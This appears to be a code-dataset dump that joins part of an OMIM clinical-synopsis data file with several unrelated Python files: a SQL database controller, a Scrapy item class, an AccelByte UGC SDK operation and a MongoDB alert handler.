'genitourinaryUretersExists': False,
'genitourinaryBladderExists': False,
'skeletalExists': False,
'skeletalSkullExists': False,
'skeletalSpineExists': False,
'skeletalPelvisExists': False,
'skeletalLimbsExists': False,
'skeletalHandsExists': False,
'skeletalFeetExists': False,
'skinNailsHairExists': False,
'skinNailsHairSkinExists': False,
'skinNailsHairSkinHistologyExists': False,
'skinNailsHairSkinElectronMicroscopyExists': False,
'skinNailsHairNailsExists': False,
'skinNailsHairHairExists': False,
'muscleSoftTissueExists': False,
'neurologicExists': False,
'neurologicCentralNervousSystemExists': False,
'neurologicPeripheralNervousSystemExists': False,
'neurologicBehavioralPsychiatricManifestationsExists': False,
'voiceExists': False,
'metabolicFeaturesExists': False,
'endocrineFeaturesExists': False,
'hematologyExists': False,
'immunologyExists': False,
'neoplasiaExists': False,
'prenatalManifestationsExists': False,
'prenatalManifestationsMovementExists': False,
'prenatalManifestationsAmnioticFluidExists': False,
'prenatalManifestationsPlacentaAndUmbilicalCordExists': False,
'prenatalManifestationsMaternalExists': False,
'prenatalManifestationsDeliveryExists': False,
'laboratoryAbnormalitiesExists': True,
'miscellaneousExists': True,
'molecularBasisExists': True,
'matches': ''
} },
{'clinicalSynopsis': {
'mimNumber': 617087,
'prefix': '#',
'preferredTitle': 'CHARCOT-MARIE-TOOTH DISEASE, AXONAL, AUTOSOMAL RECESSIVE, TYPE 2A2B; CMT2A2B',
'inheritance': 'Autosomal recessive {SNOMEDCT:258211005} {UMLS C0441748 HP:0000007} {HPO HP:0000007 C0441748,C4020899}',
'headAndNeckEars': 'Hearing impairment (in some patients) {UMLS C3806568} {HPO HP:0000365 C0011053,C0018772,C0339789,C1384666}',
'headAndNeckEyes': '''Optic atrophy {SNOMEDCT:76976005} {ICD10CM:H47.2,H47.20} {ICD9CM:377.10,377.1} {UMLS C0029124 HP:0000648} {HPO HP:0000648 C0029124};\nPale optic discs {SNOMEDCT:302200001} {UMLS C0554970 HP:0000543} {HPO HP:0000543 C0554970};\nVisual impairment, later onset (in some patients) {UMLS C4313838}''',
'respiratory': 'Respiratory insufficiency due to muscle weakness (in some patients) {UMLS C3808043} {HPO HP:0002747 C3806467}',
'skeletalSpine': '''Scoliosis {SNOMEDCT:298382003,20944008,111266001} {ICD10CM:Q67.5,M41,M41.9} {UMLS C0559260,C0036439,C4552773,C0700208 HP:0002650} {HPO HP:0002650 C0037932,C0700208};\nKyphosis {SNOMEDCT:71311003,413428007,414564002} {ICD10CM:M40.20,Q76.41} {ICD9CM:737.1} {UMLS C0022822,C0022821,C2115817,C0265673,C4552747 HP:0002808} {HPO HP:0002808 C0022821,C1845112}''',
'skeletalFeet': 'Pes cavus {SNOMEDCT:36755004,302295001,86900005,205091006} {ICD10CM:Q66.7} {ICD9CM:754.71,736.73} {UMLS C0728829,C2239098,C0579144,C0039273 HP:0001761} {HPO HP:0001761 C0728829} {EOM ID:6edfece89c0b7df3 IMG:Pes_Cavus-small.jpg}',
'muscleSoftTissue': '''Distal muscle weakness, upper and lower limbs, due to peripheral neuropathy {UMLS C3808787};\nDistal muscle atrophy, upper and lower limbs, due to peripheral neuropathy {UMLS C3808788};\nProximal muscle weakness may also occur {UMLS C4313839}''',
'neurologicCentralNervousSystem': '''Delayed gross motor development {SNOMEDCT:430099007} {UMLS C1837658 HP:0002194} {HPO HP:0002194 C1837658};\nDifficulty walking {SNOMEDCT:719232003,228158008} {ICD9CM:719.7} {UMLS C0311394 HP:0002355} {HPO HP:0002355 C0311394};\nFoot drop {SNOMEDCT:6077001} {UMLS C0085684 HP:0009027} {HPO HP:0009027 C0085684,C1866141};\nLoss of ambulation {UMLS C2678024}''',
'neurologicPeripheralNervousSystem': '''Distal sensory impairment {UMLS C1847584 HP:0002936} {HPO HP:0002936 C1847584};\nAxonal neuropathy {SNOMEDCT:60703000} {UMLS C0270921 HP:0003477} {HPO HP:0003477 C0270921,C1263857};\nHyporeflexia {SNOMEDCT:22994000,405946002} {UMLS C0151888,C0700078 HP:0001315,HP:0001265} {HPO HP:0001265 C0700078};\nSural nerve biopsy shows loss of large myelinated fibers {UMLS C1853771}''',
'miscellaneous': '''Onset in first years of life {UMLS C1848924 HP:0003593};\nVariable severity {UMLS C1861403 HP:0003828} {HPO HP:0003828 C1861403,C1866862};\nMost patients become wheelchair-bound {UMLS C1846606}''',
'molecularBasis': 'Caused by mutation in the mitofusin 2 gene (MFN2, {608507.0013})',
'inheritanceExists': True,
'growthExists': False,
'growthHeightExists': False,
'growthWeightExists': False,
'growthOtherExists': False,
'headAndNeckExists': True,
'headAndNeckHeadExists': False,
'headAndNeckFaceExists': False,
'headAndNeckEarsExists': True,
'headAndNeckEyesExists': True,
'headAndNeckNoseExists': False,
'headAndNeckMouthExists': False,
'headAndNeckTeethExists': False,
'headAndNeckNeckExists': False,
'cardiovascularExists': False,
'cardiovascularHeartExists': False,
'cardiovascularVascularExists': False,
'respiratoryExists': True,
'respiratoryNasopharynxExists': False,
'respiratoryLarynxExists': False,
'respiratoryAirwaysExists': False,
'respiratoryLungExists': False,
'chestExists': False,
'chestExternalFeaturesExists': False,
'chestRibsSternumClaviclesAndScapulaeExists': False,
'chestBreastsExists': False,
'chestDiaphragmExists': False,
'abdomenExists': False,
'abdomenExternalFeaturesExists': False,
'abdomenLiverExists': False,
'abdomenPancreasExists': False,
'abdomenBiliaryTractExists': False,
'abdomenSpleenExists': False,
'abdomenGastrointestinalExists': False,
'genitourinaryExists': False,
'genitourinaryExternalGenitaliaMaleExists': False,
'genitourinaryExternalGenitaliaFemaleExists': False,
'genitourinaryInternalGenitaliaMaleExists': False,
'genitourinaryInternalGenitaliaFemaleExists': False,
'genitourinaryKidneysExists': False,
'genitourinaryUretersExists': False,
'genitourinaryBladderExists': False,
'skeletalExists': True,
'skeletalSkullExists': False,
'skeletalSpineExists': True,
'skeletalPelvisExists': False,
'skeletalLimbsExists': False,
'skeletalHandsExists': False,
'skeletalFeetExists': True,
'skinNailsHairExists': False,
'skinNailsHairSkinExists': False,
'skinNailsHairSkinHistologyExists': False,
'skinNailsHairSkinElectronMicroscopyExists': False,
'skinNailsHairNailsExists': False,
'skinNailsHairHairExists': False,
'muscleSoftTissueExists': True,
'neurologicExists': True,
'neurologicCentralNervousSystemExists': True,
'neurologicPeripheralNervousSystemExists': True,
'neurologicBehavioralPsychiatricManifestationsExists': False,
'voiceExists': False,
'metabolicFeaturesExists': False,
'endocrineFeaturesExists': False,
'hematologyExists': False,
'immunologyExists': False,
'neoplasiaExists': False,
'prenatalManifestationsExists': False,
'prenatalManifestationsMovementExists': False,
'prenatalManifestationsAmnioticFluidExists': False,
'prenatalManifestationsPlacentaAndUmbilicalCordExists': False,
'prenatalManifestationsMaternalExists': False,
'prenatalManifestationsDeliveryExists': False,
'laboratoryAbnormalitiesExists': False,
'miscellaneousExists': True,
'molecularBasisExists': True,
'matches': ''
} },
{'clinicalSynopsis': {
'mimNumber': 617020,
'prefix': '#',
'preferredTitle': 'EPILEPTIC ENCEPHALOPATHY, EARLY INFANTILE, 38; EIEE38',
'inheritance': 'Autosomal recessive {SNOMEDCT:258211005} {UMLS C0441748 HP:0000007} {HPO HP:0000007 C0441748,C4020899}',
'headAndNeckEyes': '''Retinal dystrophy (1 patient) {UMLS C4314124} {HPO HP:0000556 C0854723};\nPoor visual contact {UMLS C3552514};\nRoving eye movements {SNOMEDCT:45339001} {ICD10CM:H55.03} {ICD9CM:379.53} {UMLS C0271384}''',
'muscleSoftTissue': 'Hypotonia {SNOMEDCT:398152000,398151007} {UMLS C0026827,C1858120 HP:0001290,HP:0001252} {HPO HP:0001290 C1858120}',
'neurologicCentralNervousSystem': '''Epileptic encephalopathy {SNOMEDCT:723125008} {UMLS C0543888 HP:0200134} {HPO HP:0200134 C0543888};\nIntractable seizures {UMLS C2674422};\nStatus epilepticus {SNOMEDCT:230456007} {UMLS C0038220 HP:0002133} {HPO HP:0002133 C0038220};\nDevelopmental delay, severe {UMLS C1853567} {HPO HP:0001263 C0557874,C1864897,C4020875};\nIntellectual disability, profound {ICD10CM:F73} {ICD9CM:318.2} {UMLS C3161330 HP:0002187} {HPO HP:0002187 C0020796,C3161330};\nAtaxia {SNOMEDCT:39384006,85102008,20262006} {ICD10CM:R27.0} {ICD9CM:438.84} {UMLS C0004134,C1135207,C0007758,C4554639 HP:0010867,HP:0001251} {HPO HP:0001251 C0007758};\nDystonia {SNOMEDCT:15802004} {ICD10CM:G24,G24.9} {UMLS C0393593,C0013421 HP:0001332} {HPO HP:0001332 C0013421,C4020871};\nPeripheral hypertonia {UMLS C1842365}''',
'miscellaneous': '''Onset in infancy {UMLS C1848924 HP:0003593} {HPO HP:0003593 C1848924};\nSevere disorder {UMLS C1836348};\nSome patients may die in early childhood {UMLS C4314122};\nTwo unrelated consanguineous families have been reported (last curated July 2016) {UMLS C4314121}''',
'molecularBasis': 'Caused by mutation in the homolog of the S. Cerevisiae ARV1 gene (ARV1, {611647.0001})',
'inheritanceExists': True,
'growthExists': False,
'growthHeightExists': False,
'growthWeightExists': False,
'growthOtherExists': False,
'headAndNeckExists': True,
'headAndNeckHeadExists': False,
'headAndNeckFaceExists': False,
'headAndNeckEarsExists': False,
'headAndNeckEyesExists': True,
'headAndNeckNoseExists': False,
'headAndNeckMouthExists': False,
'headAndNeckTeethExists': False,
'headAndNeckNeckExists': False,
'cardiovascularExists': False,
'cardiovascularHeartExists': False,
'cardiovascularVascularExists': False,
'respiratoryExists': False,
'respiratoryNasopharynxExists': False,
'respiratoryLarynxExists': False,
'respiratoryAirwaysExists': False,
'respiratoryLungExists': False,
'chestExists': False,
'chestExternalFeaturesExists': False,
'chestRibsSternumClaviclesAndScapulaeExists': False,
'chestBreastsExists': False,
'chestDiaphragmExists': False,
'abdomenExists': False,
'abdomenExternalFeaturesExists': False,
'abdomenLiverExists': False,
'abdomenPancreasExists': False,
'abdomenBiliaryTractExists': False,
'abdomenSpleenExists': False,
'abdomenGastrointestinalExists': False,
'genitourinaryExists': False,
'genitourinaryExternalGenitaliaMaleExists': False,
'genitourinaryExternalGenitaliaFemaleExists': False,
'genitourinaryInternalGenitaliaMaleExists': False,
'genitourinaryInternalGenitaliaFemaleExists': False,
'genitourinaryKidneysExists': False,
'genitourinaryUretersExists': False,
'genitourinaryBladderExists': False,
'skeletalExists': False,
'skeletalSkullExists': False,
'skeletalSpineExists': False,
'skeletalPelvisExists': False,
'skeletalLimbsExists': False,
'skeletalHandsExists': False,
'skeletalFeetExists': False,
'skinNailsHairExists': False,
'skinNailsHairSkinExists': False,
'skinNailsHairSkinHistologyExists': False,
'skinNailsHairSkinElectronMicroscopyExists': False,
'skinNailsHairNailsExists': False,
'skinNailsHairHairExists': False,
'muscleSoftTissueExists': True,
'neurologicExists': True,
'neurologicCentralNervousSystemExists': True,
'neurologicPeripheralNervousSystemExists': False,
'neurologicBehavioralPsychiatricManifestationsExists': False,
'voiceExists': False,
'metabolicFeaturesExists': False,
'endocrineFeaturesExists': False,
'hematologyExists': False,
'immunologyExists': False,
'neoplasiaExists': False,
'prenatalManifestationsExists': False,
'prenatalManifestationsMovementExists': False,
'prenatalManifestationsAmnioticFluidExists': False,
'prenatalManifestationsPlacentaAndUmbilicalCordExists': False,
'prenatalManifestationsMaternalExists': False,
'prenatalManifestationsDeliveryExists': False,
'laboratoryAbnormalitiesExists': False,
'miscellaneousExists': True,
'molecularBasisExists': True,
'matches': ''
} },
{'clinicalSynopsis': {
'mimNumber': 617069,
'prefix': '#',
'preferredTitle': 'PROGRESSIVE EXTERNAL OPHTHALMOPLEGIA WITH MITOCHONDRIAL DNA DELETIONS, AUTOSOMAL RECESSIVE 3; PEOB3',
'inheritance': 'Autosomal recessive {SNOMEDCT:258211005} {UMLS C0441748 HP:0000007} {HPO HP:0000007 C0441748,C4020899}',
'headAndNeckFace': 'Facial muscle weakness {SNOMEDCT:95666008} {ICD10CM:R29.810} {ICD9CM:438.83,781.94} {UMLS C0427055,C4553723 HP:0030319,HP:0007209} {HPO HP:0030319 C4022514}',
'headAndNeckEyes': '''External ophthalmoplegia, progressive {SNOMEDCT:46252003} {ICD10CM:H49.4} {ICD9CM:378.72} {UMLS C0162674 HP:0000544,HP:0000590} {HPO HP:0000590 C0162674};\nPtosis {SNOMEDCT:11934000,29696001} {ICD10CM:H02.4,H02.40,H02.409} {ICD9CM:374.3,374.30} {UMLS C0005745,C0033377 HP:0000508} {HPO HP:0000508 C0005745} {EOM ID:1bd157b764ec7aea IMG:Ptosis-small.jpg}''',
'chestRibsSternumClaviclesAndScapulae': 'Scapular winging {SNOMEDCT:17211005} {UMLS C0240953 HP:0003691} {HPO HP:0003691 C0240953,C4072849}',
'abdomenGastrointestinal': 'Dysphagia {SNOMEDCT:40739000,288939007} {ICD10CM:R13.1,R13.10} {ICD9CM:787.2,787.20} {UMLS C0011168,C1560331 HP:0002015,HP:0200136} {HPO HP:0002015 C0011168}',
'muscleSoftTissue': '''Muscle weakness, proximal {SNOMEDCT:249939004} {UMLS C0221629 HP:0003701} {HPO HP:0003701 C0221629,C1838869};\nMuscle atrophy, mild, proximal {UMLS C4313893} {HPO HP:0003202 C0234958,C0270948,C0541794,C1843479};\nMitochondrial myopathy {SNOMEDCT:16851005} {UMLS C0162670 HP:0003737} {HPO HP:0003737 C0162670};\nMyopathic features seen on EMG {UMLS C4231415};\nRagged red fibers seen on muscle biopsy {UMLS C3151935};\nCOX-negative fibers {UMLS C3554465};\nSkeletal muscle shows mtDNA deletions {UMLS C4313892};\nDecreased activities of mitochondrial-encoded respiratory chain complexes {UMLS C1835995 HP:0008972} {HPO HP:0008972 C1835995,C3276441,C4024609}''',
'voice': 'Dysarthria {SNOMEDCT:8011004} {ICD9CM:438.13,784.51} {UMLS C0013362,C4553903 HP:0001260} {HPO HP:0001260 C0013362}',
'laboratoryAbnormalities': '''Increased serum creatine kinase, mild {UMLS C3554474} {HPO HP:0003236 C0151576,C0241005};\nIncreased serum lactate, mild {UMLS C3809341} {HPO HP:0002151 C1836440}''',
'miscellaneous': '''Onset in mid-forties {UMLS C4228253};\nTwo Finnish sisters have been reported (last curated August 2016) {UMLS C4313890}''',
'molecularBasis': 'Caused by mutation in the nuclear-encoded mitochondrial thymidine kinase gene (TK2, {188250.0007})',
'inheritanceExists': True,
'growthExists': False,
'growthHeightExists': False,
'growthWeightExists': False,
'growthOtherExists': False,
'headAndNeckExists': True,
'headAndNeckHeadExists': False,
'headAndNeckFaceExists': True,
'headAndNeckEarsExists': False,
'headAndNeckEyesExists': True,
'headAndNeckNoseExists': False,
'headAndNeckMouthExists': False,
'headAndNeckTeethExists': False,
'headAndNeckNeckExists': False,
'cardiovascularExists': False,
'cardiovascularHeartExists': False,
'cardiovascularVascularExists': False,
'respiratoryExists': False,
'respiratoryNasopharynxExists': False,
'respiratoryLarynxExists': False,
'respiratoryAirwaysExists': False,
'respiratoryLungExists': False,
'chestExists': True,
'chestExternalFeaturesExists': False,
'chestRibsSternumClaviclesAndScapulaeExists': True,
'chestBreastsExists': False,
'chestDiaphragmExists': False,
'abdomenExists': True,
'abdomenExternalFeaturesExists': False,
'abdomenLiverExists': False,
'abdomenPancreasExists': False,
'abdomenBiliaryTractExists': False,
'abdomenSpleenExists': False,
'abdomenGastrointestinalExists': True,
'genitourinaryExists': False,
'genitourinaryExternalGenitaliaMaleExists': False,
'genitourinaryExternalGenitaliaFemaleExists': False,
'genitourinaryInternalGenitaliaMaleExists': False,
'genitourinaryInternalGenitaliaFemaleExists': False,
'genitourinaryKidneysExists': False,
'genitourinaryUretersExists': False,
'genitourinaryBladderExists': False,
'skeletalExists': False,
'skeletalSkullExists': False,
'skeletalSpineExists': False,
'skeletalPelvisExists': False,
'skeletalLimbsExists': False,
'skeletalHandsExists': False,
'skeletalFeetExists': False,
'skinNailsHairExists': False,
'skinNailsHairSkinExists': False,
'skinNailsHairSkinHistologyExists': False,
'skinNailsHairSkinElectronMicroscopyExists': False,
'skinNailsHairNailsExists': False,
'skinNailsHairHairExists': False,
'muscleSoftTissueExists': True,
'neurologicExists': False,
'neurologicCentralNervousSystemExists': False,
'neurologicPeripheralNervousSystemExists': False,
'neurologicBehavioralPsychiatricManifestationsExists': False,
'voiceExists': True,
'metabolicFeaturesExists': False,
'endocrineFeaturesExists': False,
'hematologyExists': False,
'immunologyExists': False,
'neoplasiaExists': False,
'prenatalManifestationsExists': False,
'prenatalManifestationsMovementExists': False,
'prenatalManifestationsAmnioticFluidExists': False,
'prenatalManifestationsPlacentaAndUmbilicalCordExists': False,
'prenatalManifestationsMaternalExists': False,
'prenatalManifestationsDeliveryExists': False,
'laboratoryAbnormalitiesExists': True,
'miscellaneousExists': True,
'molecularBasisExists': True,
'matches': ''
}
} ]
}
} } | [
"jhostyk@gmail.com"
] | jhostyk@gmail.com |
9b3b0b566cc27e0ffd4aa7a2d05b1dbf2f37476f | b778cae4c54893a7855987fc9b612f10047c0dad | /001_dependents/uluc_db_controller.py | f10a83abf18010e4840a3616c80146e1a8fe409b | [] | no_license | firataras07/ottoo.dp.b2b | a4577c8ef53cb7a45ac86f4875052c59b7b44417 | 70092545c873887f237a86f52677caf063180708 | refs/heads/main | 2023-07-13T12:41:09.847622 | 2021-08-23T06:11:19 | 2021-08-23T06:11:19 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,729 | py | # -*- coding: UTF-8 -*-
#
# @author: Uluc Furkan Vardar
# @updatedDate: 17.01.2021
# @version: 1.0.0
# Universal Db Controllar class
import os
import datetime
import json
class msSQL_db_controller:
def __init__(self, db_connection):
import pymssql
self.credentials = db_connection
self.cnxn = pymssql.connect(
server=self.credentials['server'],
user=self.credentials['user'],
password=self.credentials['password'],
database=self.credentials['database'],
host=self.credentials['host']
)
def execute_only(self,sql):
try:
with self.cnxn.cursor() as cur:
cur.execute(sql)
self.cnxn.commit()
try:
self.lastrowid = cur.lastrowid
except Exception as e:
print (e)
return True, None
except Exception as e:
if 'Duplicate entry' in str(e[1]):
print (str(e[1]), 'sql : ,\n%s'%(sql))
return False, 'Duplicate entry'
else:
raise Exception (str(e[1]), 'sql : ,\n%s'%(sql))
return False, None
def execute_and_return(self, sql):
try:
with self.cnxn.cursor(as_dict=True) as cur:
cur.execute(sql)
#cur.as_dict
#self.cnxn.commit()
r = cur.fetchone()
if r !=None:
return r, None
else:
return False, 'No returned row!'
except Exception as e:
raise Exception (str(e[1]), 'sql : ,\n%s'%(sql))
def execute_and_return_all(self, sql):
try:
with self.cnxn.cursor(as_dict=True) as cur:
cur.execute(sql)
#self.cnxn.commit()
r = cur.fetchall()
if r == None:
return False, 'No returned row!'
return r, None
except Exception as e:
raise Exception (str(e[1]), 'sql : ,\n%s'%(sql))
def __del__(self):
#print ("QUIT DB")
try:
self.cnxn.close()
except Exception:
pass
class mySQL_db_controller:
def __init__(self, db_connection):
self.lastrowid = None
self.credentials = db_connection
print ( self.credentials)
import pymysql
try:
self.conn = pymysql.connect(
host=self.credentials['host'],
user=self.credentials['user'],
passwd=self.credentials['password'],
db=self.credentials['database'],
connect_timeout=5,
charset='utf8',
cursorclass=pymysql.cursors.DictCursor )
except Exception as e:
#print (e)
raise Exception('DB Connection Error', e)
def execute_only(self,sql):
try:
with self.conn.cursor() as cur:
cur.execute(sql)
self.conn.commit()
try:
self.lastrowid = cur.lastrowid
except Exception as e:
print (e)
return True, None
except Exception as e:
if 'Duplicate entry' in str(e[1]):
print (str(e[1]), 'sql : ,\n%s'%(sql))
return False, 'Duplicate entry'
else:
raise Exception (str(e[1]), 'sql : ,\n%s'%(sql))
return False, None
def execute_and_return(self, sql):
try:
with self.conn.cursor() as cur:
cur.execute(sql)
field_names = [i[0] for i in cur.description]
self.conn.commit()
r = cur.fetchone()
if r !=None:
return r, None
else:
return False, 'No returned row!'
except Exception as e:
raise Exception (str(e[1]), 'sql : ,\n%s'%(sql))
def execute_and_return_all(self, sql):
d = []
try:
with self.conn.cursor() as cur:
cur.execute(sql)
self.conn.commit()
r = cur.fetchone()
if r == None:
return False, 'No returned row!'
while r!=None:
d.append( r )
r = cur.fetchone()
except Exception as e:
raise Exception (str(e[1]), 'sql : ,\n%s'%(sql))
return d,None
def execute_and_return_cursor(self, sql):
try:
with self.conn.cursor() as cur:
cur.execute(sql)
self.conn.commit()
return cur
except Exception as e:
raise Exception (str(e[1]), 'sql : ,\n%s'%(sql))
return d,None
def __del__(self):
#print ("QUIT DB")
try:
self.conn.close()
except Exception:
pass
def ex():
from uluc_db_controller import msSQL_db_controller
db_c = msSQL_db_controller(mssql_config)
resp, msg = db_c.execute_only(sql)
if msg != None:
return {'status': msg }
#MY SQL
from uluc_db_controller import mySQL_db_controller
db_c = mySQL_db_controller(mysql_config)
resp, msg = db_c.execute_only(sql)
if msg != None:
return {'status': msg }
| [
"ulucfurkanvardar@gmail.com"
] | ulucfurkanvardar@gmail.com |
7a075b8464b6cfad9e9f486f45d0b797c86ce09e | 6ebd682476e127ec955a08448d2488e00cbacaa2 | /ipma/items.py | 8c8be52a70f9fd665af39fcd999bbcd6d6623352 | [] | no_license | mbs-systems/scrapy | c2ddcf803b1b91bec193e6e1e43f3a6bf3f4aa93 | 2e4c96a05cc2e2558e9ed023e3c989160a6ec625 | refs/heads/master | 2020-04-05T17:55:49.009133 | 2018-11-11T17:11:18 | 2018-11-11T17:11:18 | 157,081,138 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 268 | py | # -*- coding: utf-8 -*-
# Define here the models for your scraped items
#
# See documentation in:
# https://doc.scrapy.org/en/latest/topics/items.html
from scrapy.item import Item, Field
class IpmaItem(Item):
page = Field()
text = Field()
link = Field()
| [
"maik.brauer@mbs-systems.net"
] | maik.brauer@mbs-systems.net |
4d8b7e849c99337bdf40184ff6f713792cf5e684 | b15d2787a1eeb56dfa700480364337216d2b1eb9 | /accelbyte_py_sdk/api/ugc/operations/admin_content/admin_hide_user_content.py | 0f01ddb7d2935b0f0a7006933cbe704ffd016507 | [
"MIT"
] | permissive | AccelByte/accelbyte-python-sdk | dedf3b8a592beef5fcf86b4245678ee3277f953d | 539c617c7e6938892fa49f95585b2a45c97a59e0 | refs/heads/main | 2023-08-24T14:38:04.370340 | 2023-08-22T01:08:03 | 2023-08-22T01:08:03 | 410,735,805 | 2 | 1 | MIT | 2022-08-02T03:54:11 | 2021-09-27T04:00:10 | Python | UTF-8 | Python | false | false | 8,991 | py | # Copyright (c) 2021 AccelByte Inc. All Rights Reserved.
# This is licensed software from AccelByte Inc, for limitations
# and restrictions contact your company contract manager.
#
# Code generated. DO NOT EDIT!
# template file: ags_py_codegen
# pylint: disable=duplicate-code
# pylint: disable=line-too-long
# pylint: disable=missing-function-docstring
# pylint: disable=missing-module-docstring
# pylint: disable=too-many-arguments
# pylint: disable=too-many-branches
# pylint: disable=too-many-instance-attributes
# pylint: disable=too-many-lines
# pylint: disable=too-many-locals
# pylint: disable=too-many-public-methods
# pylint: disable=too-many-return-statements
# pylint: disable=too-many-statements
# pylint: disable=unused-import
# AccelByte Gaming Services Ugc Service (2.11.3)
from __future__ import annotations
from typing import Any, Dict, List, Optional, Tuple, Union
from .....core import Operation
from .....core import HeaderStr
from .....core import HttpResponse
from ...models import ModelsCreateContentResponse
from ...models import ModelsHideContentRequest
from ...models import ResponseError
class AdminHideUserContent(Operation):
"""Hide/Unhide user's generated contents (AdminHideUserContent)
Required permission ADMIN:NAMESPACE:{namespace}:USER:{userId}:CONTENT [UPDATE].
Required Permission(s):
- ADMIN:NAMESPACE:{namespace}:USER:{userId}:CONTENT [UPDATE]
Properties:
url: /ugc/v1/admin/namespaces/{namespace}/users/{userId}/contents/{contentId}/hide
method: PUT
tags: ["Admin Content"]
consumes: ["application/json"]
produces: ["application/json"]
securities: [BEARER_AUTH]
body: (body) REQUIRED ModelsHideContentRequest in body
content_id: (contentId) REQUIRED str in path
namespace: (namespace) REQUIRED str in path
user_id: (userId) REQUIRED str in path
Responses:
200: OK - ModelsCreateContentResponse (OK)
401: Unauthorized - ResponseError (Unauthorized)
404: Not Found - ResponseError (Not Found)
500: Internal Server Error - ResponseError (Internal Server Error)
"""
# region fields
_url: str = (
"/ugc/v1/admin/namespaces/{namespace}/users/{userId}/contents/{contentId}/hide"
)
_method: str = "PUT"
_consumes: List[str] = ["application/json"]
_produces: List[str] = ["application/json"]
_securities: List[List[str]] = [["BEARER_AUTH"]]
_location_query: str = None
body: ModelsHideContentRequest # REQUIRED in [body]
content_id: str # REQUIRED in [path]
namespace: str # REQUIRED in [path]
user_id: str # REQUIRED in [path]
# endregion fields
# region properties
@property
def url(self) -> str:
return self._url
@property
def method(self) -> str:
return self._method
@property
def consumes(self) -> List[str]:
return self._consumes
@property
def produces(self) -> List[str]:
return self._produces
@property
def securities(self) -> List[List[str]]:
return self._securities
@property
def location_query(self) -> str:
return self._location_query
# endregion properties
# region get methods
# endregion get methods
# region get_x_params methods
def get_all_params(self) -> dict:
return {
"body": self.get_body_params(),
"path": self.get_path_params(),
}
def get_body_params(self) -> Any:
if not hasattr(self, "body") or self.body is None:
return None
return self.body.to_dict()
def get_path_params(self) -> dict:
result = {}
if hasattr(self, "content_id"):
result["contentId"] = self.content_id
if hasattr(self, "namespace"):
result["namespace"] = self.namespace
if hasattr(self, "user_id"):
result["userId"] = self.user_id
return result
# endregion get_x_params methods
# region is/has methods
# endregion is/has methods
# region with_x methods
def with_body(self, value: ModelsHideContentRequest) -> AdminHideUserContent:
self.body = value
return self
def with_content_id(self, value: str) -> AdminHideUserContent:
self.content_id = value
return self
def with_namespace(self, value: str) -> AdminHideUserContent:
self.namespace = value
return self
def with_user_id(self, value: str) -> AdminHideUserContent:
self.user_id = value
return self
# endregion with_x methods
# region to methods
def to_dict(self, include_empty: bool = False) -> dict:
result: dict = {}
if hasattr(self, "body") and self.body:
result["body"] = self.body.to_dict(include_empty=include_empty)
elif include_empty:
result["body"] = ModelsHideContentRequest()
if hasattr(self, "content_id") and self.content_id:
result["contentId"] = str(self.content_id)
elif include_empty:
result["contentId"] = ""
if hasattr(self, "namespace") and self.namespace:
result["namespace"] = str(self.namespace)
elif include_empty:
result["namespace"] = ""
if hasattr(self, "user_id") and self.user_id:
result["userId"] = str(self.user_id)
elif include_empty:
result["userId"] = ""
return result
# endregion to methods
# region response methods
# noinspection PyMethodMayBeStatic
def parse_response(
self, code: int, content_type: str, content: Any
) -> Tuple[
Union[None, ModelsCreateContentResponse],
Union[None, HttpResponse, ResponseError],
]:
"""Parse the given response.
200: OK - ModelsCreateContentResponse (OK)
401: Unauthorized - ResponseError (Unauthorized)
404: Not Found - ResponseError (Not Found)
500: Internal Server Error - ResponseError (Internal Server Error)
---: HttpResponse (Undocumented Response)
---: HttpResponse (Unexpected Content-Type Error)
---: HttpResponse (Unhandled Error)
"""
pre_processed_response, error = self.pre_process_response(
code=code, content_type=content_type, content=content
)
if error is not None:
return None, None if error.is_no_content() else error
code, content_type, content = pre_processed_response
if code == 200:
return ModelsCreateContentResponse.create_from_dict(content), None
if code == 401:
return None, ResponseError.create_from_dict(content)
if code == 404:
return None, ResponseError.create_from_dict(content)
if code == 500:
return None, ResponseError.create_from_dict(content)
return self.handle_undocumented_response(
code=code, content_type=content_type, content=content
)
# endregion response methods
# region static methods
@classmethod
def create(
cls,
body: ModelsHideContentRequest,
content_id: str,
namespace: str,
user_id: str,
**kwargs,
) -> AdminHideUserContent:
instance = cls()
instance.body = body
instance.content_id = content_id
instance.namespace = namespace
instance.user_id = user_id
return instance
@classmethod
def create_from_dict(
cls, dict_: dict, include_empty: bool = False
) -> AdminHideUserContent:
instance = cls()
if "body" in dict_ and dict_["body"] is not None:
instance.body = ModelsHideContentRequest.create_from_dict(
dict_["body"], include_empty=include_empty
)
elif include_empty:
instance.body = ModelsHideContentRequest()
if "contentId" in dict_ and dict_["contentId"] is not None:
instance.content_id = str(dict_["contentId"])
elif include_empty:
instance.content_id = ""
if "namespace" in dict_ and dict_["namespace"] is not None:
instance.namespace = str(dict_["namespace"])
elif include_empty:
instance.namespace = ""
if "userId" in dict_ and dict_["userId"] is not None:
instance.user_id = str(dict_["userId"])
elif include_empty:
instance.user_id = ""
return instance
@staticmethod
def get_field_info() -> Dict[str, str]:
return {
"body": "body",
"contentId": "content_id",
"namespace": "namespace",
"userId": "user_id",
}
@staticmethod
def get_required_map() -> Dict[str, bool]:
return {
"body": True,
"contentId": True,
"namespace": True,
"userId": True,
}
# endregion static methods
| [
"elmernocon@gmail.com"
] | elmernocon@gmail.com |
682efabebab7374e91d53d7a58b7c8d12311a35f | 839cd5616d63825192dffb3730dacb67619bda2f | /modules/maintenance/db_handler.py | a9fee5494a01f2ffb7d6522b31dab2bc848df453 | [] | no_license | Gr3yG00se64/overwatch | 1e0777005a28cc3e8e3b32d130935d6ee4163110 | 090f3d8aafe758ae29b4c5add346e1bc51cc923a | refs/heads/master | 2020-09-12T09:16:55.854617 | 2020-04-20T06:01:35 | 2020-04-20T06:01:35 | 222,378,902 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,639 | py | #Local Dependencies
import config
#Package Dependencies
from pymongo import MongoClient
def remove_alerts(alerts):
#Establish DB Connection
connection = MongoClient(config.mongoURI)
#Set Up DB for Alerts
alertDB = connection["alerts"]
alertCollection = alertDB["alerts"]
if alerts:
for alert in alerts:
alertCollection.remove({'_id': alert.get('_id')})
def retrieve_alerts():
alerts = []
# Establish DB Connection
connection = MongoClient(config.mongoURI)
# Retrieve names of all databases
dbNames = connection.list_database_names()
if 'alerts' in dbNames:
# Set Up DB for Alerts
alertDB = connection["alerts"]
alertCollection = alertDB["alerts"]
#Retrieve all alerts
db_alerts = alertCollection.find()
#Generate list of alerts
for alert in db_alerts:
alerts.append(alert)
return alerts
